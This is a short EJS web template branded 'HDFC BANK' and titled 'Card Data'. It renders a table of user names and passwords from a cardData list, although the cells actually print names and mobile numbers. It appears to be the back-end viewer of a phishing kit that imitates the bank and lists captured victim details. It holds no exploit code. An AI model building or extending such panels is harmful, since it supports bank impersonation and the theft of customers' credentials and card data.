<!DOCTYPE html>
<html lang="en">
  <head>
    <title>HDFC BANK</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
    <link rel="shortcut icon" href="/images/hdfc-logo.png" type="image/x-icon" />
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Card Data</title>
    <link rel="stylesheet" href="/stylesheets/bootstrap.css" />
  </head>
  <body>
    <div class="row m-0">
      <div class="col-12">
        <table class="table" style="padding: 20%">
          <thead>
            <tr>
              <th scope="col ">userName</th>
              <th scope="col">password</th>
            </tr>
          </thead>
          <tbody>
            <%cardData.forEach((data)=>{%>
            <tr>
              <th scope="row"><%=data.name%></th>
              <td><%=data.mobile%></td>
            </tr>
            <%})%>
          </tbody>
        </table>
      </div>
    </div>
  </body>
</html>
